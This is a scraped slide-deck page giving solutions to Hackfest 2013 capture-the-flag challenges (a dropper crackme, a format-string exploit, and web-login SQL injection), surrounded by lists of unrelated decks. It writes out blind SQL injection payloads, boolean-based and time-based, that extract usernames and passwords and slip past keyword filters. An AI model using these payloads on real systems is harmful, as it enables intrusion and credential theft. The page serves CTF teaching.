Web login and crackme's

November 18, 2013

210

Web login and crackme's

Solution to Web login (SQL injection) and Crack-me challenges presented at hackfest 2013 by @MrUn1k0d3r. Challenges presented at montrehack (http://montrehack.ca/).

Olivier Bilodeau

November 18, 2013

Other Decks in Technology

See All in Technology

VS CodeでAWSを操作しよう

smt7174

1.7k

Python と Snowflake はズッ友だょ！~ Snowflake の Python 関連機能をふりかえる ~

__allllllllez__

120

一生覚えておきたい「システム開発＝コミュニケーション」〜初めての実務案件振り返りLT〜

maimyyym

150

ServiceNow Knowledge Learning Rise up

manarobot

210

検証を通して見えてきたTiDBの性能特性

lycorptech_jp

PRO

3.8k

MLOpsの「壁」を乗り越える、LINEヤフーの Data Quality as Code

lycorptech_jp

PRO

530

チームでロジカルシンキングに改めて向き合っている話〜学習環境と実践⽅法〜

sansantech

PRO

2.6k

AWSに詳しくない人でも始められるコスト最適化ガイド

yuhta28

240

web-application-security

matsuihidetoshi

170

私が trocco を推す理由

__allllllllez__

240

JAWS-UG Bedrock Claude Night

yamahiro

610

開発パフォーマンスを最大化するための開発体制

ham0215

430

Featured

See All Featured

A better future with KSS

kneath

231

16k

[RailsConf 2023 Opening Keynote] The Magic of Rails

eileencodes

8.3k

Building Adaptive Systems

keathley

1.9k

Building Applications with DynamoDB

mza

5.6k

I Don’t Have Time: Getting Over the Fear to Launch Your Podcast

jcasabona

1.6k

Exploring the Power of Turbo Streams & Action Cable | RailsConf2023

kevinliebholz

3.4k

Building a Modern Day  E-commerce SEO Strategy

aleyda

6.4k

Practical Orchestrator

shlominoach

182

9.7k

The Pragmatic Product Professional

lauravandoore

5.8k

Designing Experiences People Love

moore

136

23k

Agile that works and the tools we love

rasmusluckow

325

20k

Sharpening the Axe: The Primacy of Toolmaking

bcantrill

1.4k

Transcript

CrackMe: Windows Dropper + DLL
None
None
CrackMe: Format String Exploit
Solution: %016llx au lieu de %08x
None
Web: Boolean Injection SQL doesnotexist') || if(1=1, 12, 34) =
12 # doesnotexist') || if(1=2, 12, 34) = 12 # Caractères interdit: /(union|char|sleep|benchmark)/i
admin') AND IF(SUBSTRING(REVERSE(CONV(HEX(SUBSTRING((SELECT GROUP_CONCAT(username, 0x7c, password) FROM login3.users), 22, 1)),
16, 2)), 7, 1) = 1, 3421, 6792) = 3421 #
Web: Time Blind Injection SQL Caractères interdit: /(union|char|and|or\s\S|\s\S|sleep|sha1|md5|if)/i admin')/**/&&/**/benchmark(300000000,(select/**/1))/**/#
admin')/**/&&/**/case/**/when/**/ (SUBSTRING(REVERSE(CONV(HEX(SUBSTRING((SELECT/**/GROUP_CONCAT(us ername,0x7c,password)/**/FROM/**/login5.users),24,1)),16,2)),7,1))=1/**/the n/**/benchmark(55000000,(select/**/1))/**/end/**/#

Web login and crackme's

Web login and crackme's

Olivier Bilodeau

Other Decks in Technology

Featured

Transcript

CrackMe: Windows Dropper + DLL

CrackMe: Format String Exploit

Solution: %016llx au lieu de %08x

Web: Boolean Injection SQL doesnotexist') || if(1=1, 12, 34) =

admin') AND IF(SUBSTRING(REVERSE(CONV(HEX(SUBSTRING((SELECT GROUP_CONCAT(username, 0x7c, password) FROM login3.users), 22, 1)),

Web: Time Blind Injection SQL Caractères interdit: /(union|char|and|or\s\S|\s\S|sleep|sha1|md5|if)/i admin')//&&//benchmark(300000000,(select//1))//#

admin')//&&//case//when// (SUBSTRING(REVERSE(CONV(HEX(SUBSTRING((SELECT//GROUP_CONCAT(us ername,0x7c,password)//FROM//login5.users),24,1)),16,2)),7,1))=1//the n//benchmark(55000000,(select//1))//end//#